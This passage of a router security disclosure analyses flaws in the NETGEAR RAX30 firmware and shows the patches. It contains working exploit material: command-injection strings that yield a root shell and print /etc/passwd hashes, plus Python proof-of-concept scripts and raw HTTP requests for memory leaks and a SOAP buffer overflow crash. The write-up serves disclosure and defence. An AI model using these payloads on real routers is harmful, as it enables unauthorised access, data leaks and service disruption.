        pCommand++;
        if (commandIndex == 0x32) {
            return 0;
        }
    }

    [TRUNCATED]

    // [1] If the command has no function pointer, execte command in shell
    if ((code *)pCommands[commandIndex].execute == (code *)0x0) {
        prctl_runCommandInShellWithTimeout(_command);                // <--- [1]
    } else {
        char* args;
        if (givenCommandFirstWordLength == commandLength) {
            args = _command + givenCommandFirstWordLength;
        } else {
            args = _command + givenCommandFirstWordLength + 1;
        }

        // Otherwise execute function pointer
        (*(code *)pCommands[commandIndex].execute)(args);
    }

    [TRUNCATED]
    return 1;
}

No data validation is performed on the command being executed; therefore, we can provide various injection characters to execute another command.

The following list is a subset of injection examples:

• ping a; /bin/sh
• ping 127.0.0.1 /bin/sh
• ping a || /bin/sh
• ping $(touch /tmp/example)
• ping `/tmp/example`
• ping a | touch /tmp/example

The following output snippet shows the command injection vulnerability being leveraged to gain a root/admin shell:

┌──(kali㉿kali)-[~]
└─$ nc 192.168.1.1 23
!BCM96750 Broadband Router
Login: user
Password: user
 > ping -c aa; /bin/sh
ping: invalid number 'aa'


BusyBox v1.31.1 (2022-03-04 19:12:56 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

# cat /etc/passwd
admin:<redacted>:0:0:Administrator:/:/bin/sh
support:$1$QkcawmV.$VU4maCah6eHihce5l4YCP0:0:0:Technical Support:/:/bin/sh
user:$1$9RZrTDt7$UAaEbCkq.Qa4u0QwXpzln/:0:0:Normal User:/:/bin/sh
nobody:<redacted>:0:0:nobody for ftp:/:/bin/sh

Web Application

The web application allowed consumers to login to the website and manage their router on the LAN/WLAN interface through a browser. The majority of the web application functionality was only accessible from an authenticated user, however some functionality was accessible as an unauthenticated user.

PSV-2022-???? – JSON Response Stack Data Leak

A memory read leak vulnerability existed in the unauthenticated web /webs/pwd_reset/reset_pwd.cgi binary which ran by default on the LAN interface of the RAX30 router. This binary is a custom NETGEAR CGI binary which handled unauthenticated password reset HTTP requests through the HTTP server.

This leak allowed you to read approximately 12 bytes from the stack before reaching a NULL byte.

Analysis

The handle_checkSN (0x015f70) function is shown below and handled a serial number check request as part of the reset password process. When the JSON parameter serialNumber was not found [2], the request JSON body [3] was passed as the error message to jsonResponse (0x0012cac) [4].

void handle_checkSN(int jsonData)
{
    fprintf(stderr,"CGI_DEBUG> %s:%d: Enter check serial number...\n","cgi_device.c",0xb5);
    int serialNumberObj;

    // Do not provide the "serialNumber" key to ensure we hit the following if statement
    int iVar1 = json_object_object_get_ex(jsonData,"serialNumber", serialNumberObj); // <--- [2]
    if (iVar1 == 0) {
        fprintf(stderr,"CGI_ERROR> %s:%d: Failed to parse the input JSON data no serialNumber!!!\n","cgi_device.c",0xd5);
        // The json is retrieved from the "data" key
        char *message = json_object_get_string(jsonData);                            // <--- [3]

        // JSON string is passed to jsonResponse
        jsonResponse("error",message);                                               // <--- [4]
        fprintf(stderr,"CGI_DEBUG> %s:%d: Exit check serial number...\n","cgi_device.c",0xd9);
    }
    else {
        [TRUNCATED]
    }
    return;
}

This function allocated a buffer of 1024 bytes on the stack [5] for the response string and then copied 1023 bytes from the JSON request to the buffer [6]. However, no NULL terminator was set at the end of the buffer, therefore when providing a request of more than 1024 bytes, no NULL value was present to terminate the string and the data following the string was leaked until a NULL byte was found when printed with printf [7].

void jsonResponse(char *status,char *message)
{
    // Buffer of size 1024
    char buffer [1024];                                      // <--- [5]

    int uVar1 = json_object_new_object();
    int uVar2 = json_object_new_string(status);
    json_object_object_add(uVar1, "status", uVar2);
    uVar2 = json_object_new_string(message);
    json_object_object_add(uVar1, "message", uVar2);
    char *json = json_object_to_json_string_ext(uVar1, 2);

    // Copy first 1023 bytes of JSON string to buffer
    strncpy(buffer, json, 1023);                             // <--- [6]

    // No NULL terminator is set at buffer[1024] = '\0', buffer is outputted to response
    printf("Content-Type: application/json\n\n%s", buffer);  // <--- [7]
    json_object_put(uVar1);
    return;
}

HTTP Requests

The following request of 971 A characters in the JSON data field value caused the server to respond with leaked memory data. Only 971 characters were required because of the additional characters appended by the server in the JSON response which in total resulted in 1024 bytes.

POST /pwd_reset/reset_pwd.cgi HTTP/1.1
Host: 192.168.2.1
Content-Length: 1008

{"function":"checkSN","data":{"":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}}

The excess binary data could be seen after the JSON response:

HTTP/1.1 200 OK
Content-Type: application/json
[TRUNCATED]
Content-Length: 1035
Server: lighttpd/1.4.59

{
  "status":"error",
  "message":"{ \"\": \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\" }"
}¶Ø}ƒ¶ /+Àw

Python Proof of Concept Script

The following proof of concept script (reset_pw_check_sn_leak.py) triggers the leak.

#!/usr/bin/env python3

import argparse
import requests
import urllib3

if __name__ == "__main__":
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    parser = argparse.ArgumentParser(description='Leak memory from the web server on NETGEAR RAX30 router.')
    parser.add_argument('--ip', default='192.168.0.1', help='The NETGEAR router web IP.')

    args = parser.parse_args()

    print('Leaking data...')
    limit = 30
    for i in range(0, limit):
        payload = 'A' * 971
        response = requests.post('http://' + args.ip + '/pwd_reset/reset_pwd.cgi', json={
            'function': 'checkSN',
            'data': {
                '': payload
            }
        }, verify=False)

        if b'status":"error' in response.content:
            overflow = response.content[1023:]
            print(str(i + 1) + '/' + str(limit) + ': ' + " ".join(["{:02x}".format(x) for x in overflow]))
        else:
            print('Received unexpected response from server!')

Upon executing this script, we can see the leaked memory bytes containing memory pointers.

└─$ python3 reset_pw_check_sn_leak.py
Leaking data...
1/10: b6 d8 0d 81 b6 28 8f e2 01 c0 77 01
2/10: b6 d8 0d 82 b6 28 1f 4c
3/10: b6 d8 cd 84 b6 28 3f ba
4/10: b6 d8 ad 84 b6 28 5f 59
5/10: b6 d8 7d 7e b6 28 df a6 01 c0 77 01
6/10: b6 d8 fd 80 b6 28 af 65
7/10: b6 d8 6d 87 b6 28 1f b1 01 c0 77 01
8/10: b6 d8 dd 87 b6 28 ff a9 01 c0 77 01
9/10: b6 d8 4d 7d b6 28 9f bf
10/10: b6 d8 3d 87 b6 28 cf 8e 01 c0 77 01

Patch v1.0.9.92

The buffer stack variable is now initialized with NULL bytes and as only 1023 bytes are copied from the JSON string, the buffer will always have a NULL terminator.

void jsonResponse(char *status,char *message)
{
    // Buffer of size 1024
    char buffer [1024];
    memset(buffer, 0, 1024);
    ...
    strncpy(buffer, json, 1023);
}

SOAP Service

A HTTPS SOAP service (/bin/soap_serverd) runs by default on port LAN 5043/tcp. The custom NETGEAR SOAP service handles HTTPS requests from the Nighthawk App when the mobile device is connected to the router on the LAN/WLAN interface. The /bin/soap_serverd binary auto-restarts after approximately 15 seconds when it has terminated or crashed.

Checking the /bin/soap_serverd binary with checksec.py shows the following protections are set:

└─$ checksec --file bin/soap_serverd 
[*] '/bin/soap_serverd'
    Arch:     arm-32-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
    FORTIFY:  Enabled

The presence of these mitigation’s cause many vulnerabilities to be ineffective on their own and usually require multiple vulnerabilities to be chained together to overcome.

For example, a stack canary inserts a random 4 byte value at the end of the stack variables and therefore any stack buffer overflow vulnerabilities will corrupt this value before corrupting important stack values such as the next return pointer. A check occurs at the end of each function to validate the stack canary is not corrupted, however if it is corrupt, the binary will terminate with the error message “Stack smashing detected”.

Address layout randomization (ASLR) is enabled which changes the base address of the main executable, libraries and the heap each time the executable is ran. Therefore, hard-coded addresses cannot be used in the vulnerability payload and instead a separate leak vulnerability is required.

PSV-2023-0009 – Write HTTP Response Stack Pointer Leak

Analysis

A stack pointer leak vulnerability exists within the writeHttpResponse (0x0018b4c) function which handles sending the HTTP response to the API request. The vulnerability occurs due to the executing of strncat [8] on the stack buffer response without initialising the buffer with data. Therefore, if any data exists in memory at the response stack location that does not start with a NULL byte, that data will be sent in the HTTP response before the main HTTP response.

void writeHttpResponse(UnkArg *param_1, int httpCode, char *httpCodeStr, int param_4, char *message)
{
    size_t responseLen;
    char buffer [128];
    char response [1024];

    _writeHttpHeaders(httpCode, httpCodeStr, param_4, "text/html");
    memset(buffer, 0, 0x80);
    __snprintf_chk(buffer, 0x80, 1, 0x80, "<HTML><HEAD><TITLE>%d %s</TITLE></HEAD>\n<BODY BGCOLOR=\"#cc9999\"><H4>%d %s</H4>\ n", httpCode, httpCodeStr, httpCode, httpCodeStr);
    strncat(response, buffer, 0x80); // Buffer is appended to any existing data in the response variable  <--- [8]
    memset(buffer, 0, 0x80);
    __snprintf_chk(buffer, 0x80, 1, 0x80, "%s\n", message);
    strncat(response, buffer, 0x80);
    memset(buffer, 0, 0x80);
    __snprintf_chk(buffer, 0x80, 1, 0x80, "<HR>\n<ADDRESS><A HREF=\"%s\">%s</A></ADDRESS>\n</BODY></HTML>\n", "http://schemas.xmlsoap.org/soap/encoding/", "\"OS/version\" UPnP/1.0 \"product/version\"");
    strncat(response, buffer, 0x80);
    responseLen = strlen(response);
    __fprintf_chk(param_1->file, 1, response, responseLen);
    return;
}

HTTP Requests

To trigger the stack pointer leak, a valid SOAP request with a large SOAPAction buffer is sent to the SOAP service to create a large HTTP response. This is done to avoid NULL bytes truncating the amount of data that is leaked.

POST /soap/server_sa/ HTTP/1.0
User-Agent: ksoap2-android/2.6.0+
SOAPAction: urn:NETGEAR-ROUTER:service:DeviceInfo:1#AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Content-Length: 443
Host: 192.168.2.1:5043

<!--?xml version="1.0" encoding= "UTF-8" ?-->
<v:Envelope xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns:d="http://www.w3.org/2001/XMLSchema" xmlns:c="http://schemas.xmlsoap.org/soap/encoding/" xmlns:v="http://schemas.xmlsoap.org/soap/envelope/">
    <v:Header>
        <SessionId></SessionId>
    </v:Header>
    <v:Body>
        <n0:GetInfo xmlns:n0="urn:NETGEAR-ROUTER:service:DeviceInfo:1" />
    </v:Body>
</v:Envelope>

Next, an invalid request is made to trigger the writeHttpResponse function call which returns the HTTP response with the leaked data preceding it.

INVALID /soap/server_sa/ HTTP/1.0
User-Agent: ksoap2-android/2.6.0+
Content-Length: 0
Host: 192.168.2.1:5043

The resulting response outputs the leaked memory before the HTTP response, including a stack address pointer:

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAResponse
        xmlns:m="urn:NETGEAR-ROUTER:service:DeviceInfo:1">
    <¨È×¾HTTP/1.1 400 Bad Request
Server: "OS/version" UPnP/1.0 "product/version"
Date: Fri, 02 Dec 2022 01:07:47 GMT
Content-Type: text/html
Connection: close

<HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD>
<BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>
That method is not handled by us.
<HR>
<ADDRESS><A HREF="http://schemas.xmlsoap.org/soap/encoding/">"OS/version" UPnP/1.0 "product/version"</A></ADDRESS>
</BODY>

Python Proof of Concept Script

The following proof of concept script (soap_cat_memory_leak.py) can be executed to leak the stack address range and stack pointer address on firmware version v1.0.9.92.

#!/usr/bin/env python3

import argparse
import requests
import urllib3
import struct
import ssl
import socket

def sendLargeBuffer(url, length):

    payload = 'A' * length

    headers = {
        'User-Agent': 'ksoap2-android/2.6.0+',
        'SOAPAction': 'urn:NETGEAR-ROUTER:service:DeviceInfo:1#' + payload,
        'Content-Type': 'text/xml;charset=utf-8',
    }

    xml = """
    <!--?xml version="1.0" encoding= "UTF-8" ?-->
    <v:Envelope xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns:d="http://www.w3.org/2001/XMLSchema" xmlns:c="http://schemas.xmlsoap.org/soap/encoding/" xmlns:v="http://schemas.xmlsoap.org/soap/envelope/">
        <v:Header>
            <SessionId></SessionId>
        </v:Header>
        <v:Body>
            <n0:GetInfo xmlns:n0="urn:NETGEAR-ROUTER:service:DeviceInfo:1" />
        </v:Body>
    </v:Envelope>
    """

    requests.post(url, data=xml, headers=headers, verify=False)

def triggerMemoryLeak(hostname, port):
    request = """INVALID /soap/server_sa/ HTTP/1.0
User-Agent: ksoap2-android/2.6.0+
Content-Length: 0
Host: """+hostname+""":"""+str(port)+"""

"""

    # Create SSL context
    cxt = ssl.create_default_context()
    cxt.check_hostname = False
    cxt.verify_mode = ssl.CERT_NONE

    # HTTPS Request
    response = b""
    with socket.create_connection((args.domain, args.port)) as sock:
        with cxt.wrap_socket(sock, server_hostname=args.domain) as ssock:
            ssock.send(request.encode())
            while True:
                data = ssock.recv(2048)
                if len(data) <= 0:
                    break
                response += data

    return response

if __name__ == "__main__":
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    parser = argparse.ArgumentParser(description='Remote stack pointer leak from soap_serverd binary on NETGEAR RAX30 router.')
    parser.add_argument('--domain', default='routerlogin.net', help='The NETGEAR router domain.')
    parser.add_argument('--port', default=5043, type=int, help='The router soap server port.')

    args = parser.parse_args()
    domain = 'https://' + args.domain + ':' + str(args.port)

    print('Sending large buffer...')
    sendLargeBuffer(domain + '/soap/server_sa/', 500)

    print('Triggering leak...')
    response = triggerMemoryLeak(args.domain, args.port)

    # Remove surrounding ASCII
    leakStart = b'xmlns:m="urn:NETGEAR-ROUTER:service:DeviceInfo:1">\r\n    <'
    leakEnd = b'HTTP/1.1 400 Bad Request\r\n'
    leak = response[response.index(leakStart)+len(leakStart):response.index(leakEnd)]

    # Print leaked data
    print('Leaked data: ' + " ".join(["{:02x}".format(x) for x in leak]))

    # Print leaked stack address
    address = struct.unpack('<I', leak[:4])[0]
    print('Stack Pointer: ' + hex(address))
    print('Stack: ' + hex(address - 0x1D8A8) + '-' + hex(address + 0x3758))

The following script output shows the stack pointer 0xbed7c8a8 was leaked, which was used to determine the stack memory range of 0xbed5f000 to 0xbed80000.

└─$ python3 soap_cat_memory_leak.py --domain 192.168.1.1 --port 5043
Sending large buffer...
Triggering leak...
Leaked data: a8 c8 d7 be 01
Stack Pointer: 0xbed7c8a8
Stack: 0xbed5f000-0xbed80000

Patch v1.0.10.94

The patch clears any existing data in the response variable by setting all bytes to zero using memset[1]. Although strncat is still used, it will function like strncpy as the buffer begins with a NULL byte.

void writeHttpResponse(UnkArg *param_1, int httpCode, char *httpCodeStr, int param_4, char *message)
{
    size_t responseLen;
    char buffer [128];
    char response [1024];

    memset(response, 0, 1024); // [1]
    memset(buffer, 0, 128);
    _writeHttpHeaders(httpCode, httpCodeStr, param_4, "text/html");
    memset(buffer, 0, 0x80);
    __snprintf_chk(buffer, 0x80, 1, 0x80, "<HTML><HEAD><TITLE>%d %s</TITLE></HEAD>\n<BODY BGCOLOR=\"#cc9999\"><H4>%d %s</H4>\ n", httpCode, httpCodeStr, httpCode, httpCodeStr);
    strncat(response, buffer, 0x80);
    memset(buffer, 0, 0x80);
    __snprintf_chk(buffer, 0x80, 1, 0x80, "%s\n", message);
    strncat(response, buffer, 0x80);
    memset(buffer, 0, 0x80);
    __snprintf_chk(buffer, 0x80, 1, 0x80, "<HR>\n<ADDRESS><A HREF=\"%s\">%s</A></ADDRESS>\n</BODY></HTML>\n", "http://schemas.xmlsoap.org/soap/encoding/", "\"OS/version\" UPnP/1.0 \"product/version\"");
    strncat(response, buffer, 0x80);
    responseLen = strlen(response);
    __fprintf_chk(param_1->file, 1, response, responseLen);
    return;
}

PSV-2022-???? – SOAPAction Stack Buffer Overflow

Analysis

The vulnerability existed within the soap_response (0x006A9C) function which handled sending the SOAP response to the API request. This function allocated a buffer of 2048 bytes on the stack for the response XML string. The value provided after “#” in the SOAPAction header such as #Hello was then appended to an XML response tag, resulting in <m:HelloResponse...></m:HelloResponse>. The developers did not consider the scenario where the SOAPAction value was large as the output response was doubled for a large request due to being inserted in the opening and closing XML tag. Additionally, the insecure functions strcpy, strcat and sprintf were used extensively within this function.

The size of the standard response was approximately 264 bytes without the SOAPAction input before the overflow occurs. Given a SOAPAction input of 900, we can determine the approximate buffer size of 2064 bytes ((900 * 2) + 264). Thus, the buffer overflows by approximately 16 bytes.

The overflow was triggered in function soap_response (0x006A9C) in various function calls such as strcpy and spritnf depending on the size of the SOAPAction value as shown in the following code snippet:

void soap_response(undefined4 param_1,char *soapActionValue,undefined4 param_3,undefined4 *param_4, int para,char *result)
{
    int iVar9;
    char *local_58;
    char *local_54;
    int i = -(iVar9 + 0x807U   0xfffffff8);
    char* __dest_01 = (char *)((int) local_58 + i);
    char* pcVar7 =  stack0x0000008d + i;
    memset(__dest_01,0,iVar9 + 0x800);
    strcpy(__dest_01, "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<soap-env:Envelope\r\n        xmlns:soap-env =\"http://schemas.xmlsoap.org/soap/envelope/\"\r\n        soap-env:encodingStyle=\"http://s chemas.xmlsoap.org/soap/encoding/\">\r\n<soap-env:Body>\r\n    <m:");
    int offset = sprintf(pcVar7,"%s",soapActionValue); // Copy SOAPAction value for the first time
    pcVar7 = pcVar7 + offset;
    char* pcVar8 = pcVar7 + 0x36;
    strcpy(pcVar7,"Response\r\n        xmlns:m=\"urn:NETGEAR-ROUTER:service:"); // Append hard-coded XML string to buffer
    offset = sprintf(pcVar8,"%s",local_54);
    char* __dest = pcVar8 + offset + 6;
    strcpy(pcVar8 + offset,":1\">\r\n"); // Append hard-coded XML string to buffer
    local_54 =  DAT_0004012b;
    pcVar7 = "        <%s>%s</%s>\r\n";
    ...
    strcpy(__dest,"    </m:"); // Append hard-coded XML string to buffer
    offset = sprintf(__dest + 8,"%s",soapActionValue); // Copy SOAPAction value for the second time
    pcVar7 = __dest + 8 + offset;
    strcpy(pcVar7,"Response>\r\n"); // Append hard-coded XML string to buffer
    ...
}

HTTP Request

The following request was unauthenticated and caused the binary to crash within sprintf from a corrupted stack due to the overflow of the SOAPAction header.

POST /soap/server_sa/ HTTP/1.1
User-Agent: ksoap2-android/2.6.0+
SOAPAction: urn:NETGEAR-ROUTER:service:DeviceInfo:1#AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Content-Type: text/xml;charset=utf-8
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 416
Host: routerlogin.net:5043

<!--?xml version="1.0" encoding= "UTF-8" ?--><v:Envelope xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns:d="http://www.w3.org/2001/XMLSchema" xmlns:c="http://schemas.xmlsoap.org/soap/encoding/" xmlns:v="http://schemas.xmlsoap.org/soap/envelope/"><v:Header><SessionId></SessionId></v:Header><v:Body><n0:GetInfo xmlns:n0="urn:NETGEAR-ROUTER:service:DeviceInfo:1" /></v:Body></v:Envelope>

Python Proof of Concept Script

The following proof of concept Python3 script (soap_action_overflow.py) triggers the stack buffer overflow on firmware version v1.0.7.78, causing the service to crash.

#!/usr/bin/env python3

import argparse
import requests
import urllib3

if __name__ == "__main__":
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    parser = argparse.ArgumentParser(description='Crash soap_serverd binary on NETGEAR RAX30 router from a response buffer overflow.')
    parser.add_argument('--domain', default='routerlogin.net', help='The NETGEAR router domain.')
    parser.add_argument('--port', default=5043, type=int, help='The router soap server port.')

    args = parser.parse_args()

    payload = 'A' * 900

    headers = {
        'User-Agent': 'ksoap2-android/2.6.0+',
        'SOAPAction': 'urn:NETGEAR-ROUTER:service:DeviceInfo:1#' + payload,
        'Content-Type': 'text/xml;charset=utf-8',
    }

    xml = """
    <!--?xml version="1.0" encoding= "UTF-8" ?-->
    <v:Envelope xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns:d="http://www.w3.org/2001/XMLSchema" xmlns:c="http://schemas.xmlsoap.org/soap/encoding/" xmlns:v="http://schemas.xmlsoap.org/soap/envelope/">
        <v:Header>
            <SessionId></SessionId>
        </v:Header>
        <v:Body>
            <n0:GetInfo xmlns:n0="urn:NETGEAR-ROUTER:service:DeviceInfo:1" />
        </v:Body>
    </v:Envelope>
    """

    try:
        print('Sending payload...')
        requests.post('https://' + args.domain + ':' + str(args.port) + '/soap/server_sa/', data=xml, headers=headers, verify=False)
        print('Payload failed to crash server.')
    except requests.exceptions.ConnectionError as e:
        if 'Remote end closed connection' in str(e):
            print('Payload crashed server!')
        else:
            print(str(e))

Patch v1.0.9.92

The SOAP Action name length check was moved to occur before the service_type switch statement in the soap_action (0x016f78) function. Previously, this name length check only occured on an invalid service_type.

if (500 < actionNameLength)
{
    _actionNameLength = cmsUtl_strlen(actionName);
    log_log(3,"soap_action",0x130,"The length of ac is too long, it may be a bug or an attack.\n ac=%s length=%d",actionName,_actionNameLength,iVar8);
    actionName = "SOAP_ActionName_Too_Long";
    puVar6 =  DAT_0004115e;
    pcVar1 = "soap_action";
    goto LAB_000173c0;
}

It should be noted however, the root cause of the vulnerability within the soap_response function was not patched in v1.0.9.92 therefore it may still be possible to overflow the response buffer if other large attacker-controlled data can be introduced into the HTTP response.

PSV-2023-0010 – HTTP Body Off-By-One NULL Terminator Stack Canary Corruption

Analysis

An off-by-one NULL terminator caused the stack canary to become corrupt in the body stack buffer of 2,048 bytes within the handle_soapRequest (0x000152f0) function when a body payload of 2,048 bytes was passed. The process proceeded to terminate once the stack canary was corrupted with a stack smashing detected error.

This can be seen in the following code snippet. The handle_soapRequest (0x000152f0) function has a stack body buffer of 2,048 bytes [9], which is filled within the freadFile (0x000181b4) [10] [11] function when a body of 2,048 bytes is processed. freadFile returns the length read [12] which is 2,048 and that is stored in the bodyLength variable [13]. A NULL terminator is then wrote to bodyLength + 1 [14] which is 2,049 and therefore is wrote 1 byte out of bounds and corrupts the stack canary.

int handle_soapRequest(char* ip)
{
    char body [2048];                      // <-- [9] Body stack buffer of 2048 bytes
    ...
    memset(body, 0, 2048);
    ...
    int bodyLength = freadFile(body);      // <--- [10], [13] Data fills body buffer from HTPT request, body length is returned
    if (bodyLength > 0)
    {
        body[bodyLength + 1] = '\0';       // <-- [14] Out of bounds NULL byte write (bodyLength + 1 = 2049)
        soap_action(0,soapAction,body,ip);
    }
    ...
}

int freadFile(int param_1,char *buffer)
{
    memset(buffer, 0, 2048);
    int readCount = fread(buffer, 1, 2048, *(FILE **)(param_1 + 0xc)); // <-- [11] Data fills buffer from HTTP request with 2048 bytes
    return readCount;                                                  // <-- [12] Number of bytes read from HTTP request (max readCount = 2048)
}

HTTP Request

The following HTTP request triggers the out of bounds NULL terminator write:

POST /soap/server_sa/ HTTP/1.1
User-Agent: ksoap2-android/2.6.0+
SOAPAction: urn:NETGEAR-ROUTER:service:DeviceInfo:1#A
Content-Length: 2048
Host: 192.168.2.1:5043

